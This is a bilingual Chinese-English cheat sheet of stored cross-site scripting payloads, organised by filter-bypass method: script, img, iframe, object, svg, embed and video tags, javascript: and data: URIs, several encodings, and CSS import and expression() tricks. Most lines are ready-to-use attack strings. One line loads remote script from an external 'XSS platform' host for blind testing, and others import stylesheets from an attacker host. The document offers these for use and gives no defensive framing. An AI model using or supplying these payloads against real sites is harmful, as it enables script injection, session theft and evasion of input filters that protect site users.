存储型写法
<script>alert(/StoredXssByScriptTag/);</script>
"'><script>alert(/StoredXssByScriptTagBypass);</script>
[Bypass on Event] [事件型绕过]
<img src=1 onerror=alert(/StoredXssByImgTag/)> #一般富文本不会过滤img标签
[Bypass pseudo protocol] [伪协议绕过]
<iframe src=javascript:prompt(/StoredXssByIframeTag/);></iframe>
<object data=data:text/html;base64,PHNjcmlwdD5wcm9tcHQoL1N0b3JlZFhzc0J5T2JqZWN0VGFnLyk7PC9zY3JpcHQ+></object>
[Bypass html5 tag] [html5标签绕过]
<svg onload=prompt(/StoredXssBySvgTag/)>
<embed src=javascript:alert(/StoredXssByEmbedTag/);>
[Bypass html or js encode] [js编码,html编码,十进制编码绕过等]
<embed src=javascript:alert(/StoredXssByEmbedTagAndHtmlEncode/);>
<video><source onerror=alert(String.fromCharCode(47,83,116,111,114,101,100,88,115,115,98,121,86,105,100,101,111,84,97,103,65,110,100,83,116,114,105,110,103,69,110,99,111,100,101,47))>
<script/src=data:text/j\141v\141script,\u0061%6C%65%72%74(/StoredXssbyScriptTagAndJSEncode/)></script>
如果进行盲测可以根据xss平台地址替换相应的js触发代码
"><script src=http://myxss.net/xxxxxx></script>
样式类
<style>@import url("http://attacker.org/malicious.css");</style>
<style>@imp\ort url("http://attacker.org/malicious.css");</style>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<STYLE>@import'http://jb51.net/xss.css';</STYLE>
style
<div style="color: expression(alert('XSS'))">
<div style=color:expression\(alert(1))></div>
<div style="color: '<'; color: expression(alert('XSS'))">
<div style=X:expression(alert(/xss/))>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">
<div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">
<div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
<DIV STYLE="background-image: url(javascript:alert('XSS'))">